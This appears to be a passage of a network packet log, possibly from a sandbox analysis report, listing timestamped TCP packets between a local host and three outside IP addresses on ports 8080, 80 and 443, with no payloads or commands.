Jan 14, 2022 00:15:23.442764997 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.442804098 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.442826033 CET	49807	8080	192.168.2.4	185.7.214.171
Jan 14, 2022 00:15:23.442843914 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.442862988 CET	49807	8080	192.168.2.4	185.7.214.171
Jan 14, 2022 00:15:23.442881107 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.442935944 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.442989111 CET	49807	8080	192.168.2.4	185.7.214.171
Jan 14, 2022 00:15:23.443043947 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.443083048 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.443098068 CET	49807	8080	192.168.2.4	185.7.214.171
Jan 14, 2022 00:15:23.443125010 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.443176985 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.443233013 CET	49807	8080	192.168.2.4	185.7.214.171
Jan 14, 2022 00:15:23.443281889 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.443321943 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.443336010 CET	49807	8080	192.168.2.4	185.7.214.171
Jan 14, 2022 00:15:23.443360090 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.443398952 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.443438053 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.443450928 CET	49807	8080	192.168.2.4	185.7.214.171
Jan 14, 2022 00:15:23.443476915 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.443491936 CET	49807	8080	192.168.2.4	185.7.214.171
Jan 14, 2022 00:15:23.443516970 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.443555117 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.443593025 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.443608046 CET	49807	8080	192.168.2.4	185.7.214.171
Jan 14, 2022 00:15:23.443631887 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.443645000 CET	49807	8080	192.168.2.4	185.7.214.171
Jan 14, 2022 00:15:23.443669081 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.443708897 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.443747044 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.443783045 CET	49807	8080	192.168.2.4	185.7.214.171
Jan 14, 2022 00:15:23.443785906 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.443825006 CET	49807	8080	192.168.2.4	185.7.214.171
Jan 14, 2022 00:15:23.443826914 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.443864107 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.443877935 CET	49807	8080	192.168.2.4	185.7.214.171
Jan 14, 2022 00:15:23.443902969 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.443943024 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.443978071 CET	49807	8080	192.168.2.4	185.7.214.171
Jan 14, 2022 00:15:23.443979979 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.444019079 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.444048882 CET	49807	8080	192.168.2.4	185.7.214.171
Jan 14, 2022 00:15:23.444056988 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.444097042 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.444113016 CET	49807	8080	192.168.2.4	185.7.214.171
Jan 14, 2022 00:15:23.444161892 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.444200993 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.444215059 CET	49807	8080	192.168.2.4	185.7.214.171
Jan 14, 2022 00:15:23.444238901 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.444278002 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.444299936 CET	49807	8080	192.168.2.4	185.7.214.171
Jan 14, 2022 00:15:23.444317102 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.444355011 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.444413900 CET	49807	8080	192.168.2.4	185.7.214.171
Jan 14, 2022 00:15:23.444427013 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.444459915 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.444489956 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.444528103 CET	49807	8080	192.168.2.4	185.7.214.171
Jan 14, 2022 00:15:23.444545984 CET	49807	8080	192.168.2.4	185.7.214.171
Jan 14, 2022 00:15:23.505197048 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.505223989 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.505253077 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.505278111 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.505311966 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.505347013 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.505369902 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.505371094 CET	49807	8080	192.168.2.4	185.7.214.171
Jan 14, 2022 00:15:23.505386114 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.505400896 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.505400896 CET	49807	8080	192.168.2.4	185.7.214.171
Jan 14, 2022 00:15:23.505407095 CET	49807	8080	192.168.2.4	185.7.214.171
Jan 14, 2022 00:15:23.505414963 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.505430937 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.505446911 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.505465984 CET	49807	8080	192.168.2.4	185.7.214.171
Jan 14, 2022 00:15:23.505476952 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.505487919 CET	49807	8080	192.168.2.4	185.7.214.171
Jan 14, 2022 00:15:23.505494118 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.505517006 CET	49807	8080	192.168.2.4	185.7.214.171
Jan 14, 2022 00:15:23.505525112 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.505546093 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.505565882 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.505585909 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.505585909 CET	49807	8080	192.168.2.4	185.7.214.171
Jan 14, 2022 00:15:23.505606890 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.505608082 CET	49807	8080	192.168.2.4	185.7.214.171
Jan 14, 2022 00:15:23.505628109 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.505641937 CET	49807	8080	192.168.2.4	185.7.214.171
Jan 14, 2022 00:15:23.505649090 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.505676031 CET	49807	8080	192.168.2.4	185.7.214.171
Jan 14, 2022 00:15:23.505786896 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.505840063 CET	49807	8080	192.168.2.4	185.7.214.171
Jan 14, 2022 00:15:23.505940914 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.505992889 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.506019115 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.506042004 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.506061077 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.506073952 CET	49807	8080	192.168.2.4	185.7.214.171
Jan 14, 2022 00:15:23.506082058 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.506103039 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.506108999 CET	49807	8080	192.168.2.4	185.7.214.171
Jan 14, 2022 00:15:23.506124020 CET	49807	8080	192.168.2.4	185.7.214.171
Jan 14, 2022 00:15:23.506139040 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.506181002 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.506212950 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.506232023 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.506232023 CET	49807	8080	192.168.2.4	185.7.214.171
Jan 14, 2022 00:15:23.506251097 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.506263971 CET	49807	8080	192.168.2.4	185.7.214.171
Jan 14, 2022 00:15:23.506272078 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.506299019 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.506310940 CET	49807	8080	192.168.2.4	185.7.214.171
Jan 14, 2022 00:15:23.506320000 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.506340027 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.506350994 CET	49807	8080	192.168.2.4	185.7.214.171
Jan 14, 2022 00:15:23.506361008 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.506381989 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.506402016 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.506411076 CET	49807	8080	192.168.2.4	185.7.214.171
Jan 14, 2022 00:15:23.506422043 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.506448984 CET	49807	8080	192.168.2.4	185.7.214.171
Jan 14, 2022 00:15:23.506467104 CET	49807	8080	192.168.2.4	185.7.214.171
Jan 14, 2022 00:15:23.506680012 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.506728888 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.506748915 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.506771088 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.506792068 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.506803036 CET	49807	8080	192.168.2.4	185.7.214.171
Jan 14, 2022 00:15:23.506812096 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.506839991 CET	49807	8080	192.168.2.4	185.7.214.171
Jan 14, 2022 00:15:23.506864071 CET	49807	8080	192.168.2.4	185.7.214.171
Jan 14, 2022 00:15:23.566509962 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.566648960 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.566715002 CET	49807	8080	192.168.2.4	185.7.214.171
Jan 14, 2022 00:15:23.566730022 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.566771030 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.566811085 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.566849947 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.566852093 CET	49807	8080	192.168.2.4	185.7.214.171
Jan 14, 2022 00:15:23.566898108 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.566904068 CET	49807	8080	192.168.2.4	185.7.214.171
Jan 14, 2022 00:15:23.566936970 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.566975117 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.567013979 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.567030907 CET	49807	8080	192.168.2.4	185.7.214.171
Jan 14, 2022 00:15:23.567060947 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.567066908 CET	49807	8080	192.168.2.4	185.7.214.171
Jan 14, 2022 00:15:23.567123890 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.567176104 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.567214966 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.567233086 CET	49807	8080	192.168.2.4	185.7.214.171
Jan 14, 2022 00:15:23.567255020 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.567269087 CET	49807	8080	192.168.2.4	185.7.214.171
Jan 14, 2022 00:15:23.567293882 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.567332983 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.567373037 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.567410946 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.567425013 CET	49807	8080	192.168.2.4	185.7.214.171
Jan 14, 2022 00:15:23.567450047 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.567488909 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.567506075 CET	49807	8080	192.168.2.4	185.7.214.171
Jan 14, 2022 00:15:23.567527056 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.567560911 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.567620993 CET	49807	8080	192.168.2.4	185.7.214.171
Jan 14, 2022 00:15:24.945168972 CET	49808	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:24.997240067 CET	80	49808	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:24.997330904 CET	49808	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:24.997441053 CET	49808	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:24.997500896 CET	49808	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:25.049290895 CET	80	49808	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:25.049746990 CET	80	49808	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:25.075172901 CET	80	49808	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:25.075267076 CET	49808	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:25.075469971 CET	49808	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:25.101905107 CET	49809	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:25.127111912 CET	80	49808	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:25.156804085 CET	80	49809	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:25.157037020 CET	49809	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:25.157053947 CET	49809	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:25.157059908 CET	49809	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:25.210616112 CET	80	49809	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:25.238081932 CET	80	49809	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:25.238228083 CET	49809	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:25.238409996 CET	49809	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:25.290508032 CET	80	49809	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:25.298688889 CET	49810	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:25.350826025 CET	80	49810	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:25.350965023 CET	49810	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:25.351042032 CET	49810	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:25.351057053 CET	49810	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:25.403006077 CET	80	49810	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:25.432991028 CET	80	49810	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:25.435448885 CET	49810	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:25.435627937 CET	49810	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:25.464180946 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.464236021 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.464468956 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.464766026 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.464787006 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.487242937 CET	80	49810	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:25.514580011 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.514729977 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.516844034 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.516875029 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.517174006 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.518625021 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.558572054 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.558732986 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.558803082 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.558861017 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.558873892 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.558911085 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.558968067 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.558978081 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.558995962 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.559022903 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.559060097 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.559113026 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.559171915 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.559181929 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.559201956 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.559238911 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.559335947 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.559395075 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.559406996 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.559475899 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.559546947 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.559607029 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.559618950 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.559637070 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.559678078 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.559777021 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.559835911 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.559848070 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.559954882 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.560050964 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.560106039 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.560117960 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.560174942 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.560184002 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.560208082 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.560285091 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.560300112 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.560390949 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.560460091 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.560472965 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.560544968 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.560622931 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.560682058 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.560695887 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.560753107 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.560764074 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.560832977 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.560890913 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.560947895 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.560949087 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.560966969 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.561007023 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.561063051 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.561120033 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.561120033 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.561136961 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.561230898 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.561288118 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.561290979 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.561306953 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.561346054 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.561415911 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.561486006 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.561497927 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.577722073 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.577802896 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.577862024 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.577899933 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.577920914 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.577929020 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.577992916 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.578011036 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.578068972 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.578272104 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.578371048 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.578511953 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.578587055 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.578612089 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.578685999 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.578699112 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.578722954 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.578763008 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.578790903 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.578835011 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.578913927 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.578938007 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.579010010 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.579035997 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.579102993 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.579123974 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.579201937 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.579216957 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.579240084 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.579277039 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.579339027 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.579408884 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.579423904 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.579451084 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.579483986 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.579497099 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.579514027 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.579539061 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.579601049 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.579611063 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.579633951 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.579672098 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.579684019 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.579699993 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.597301960 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.597395897 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.597487926 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.597531080 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.597552061 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.597707033 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.597783089 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.597796917 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.597835064 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.597861052 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.597878933 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.597901106 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.597956896 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.598026037 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.598038912 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.598105907 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.598356009 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.598443031 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.598476887 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.598552942 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.598561049 CET	49811	443	192.168.2.4	162.159.130.233
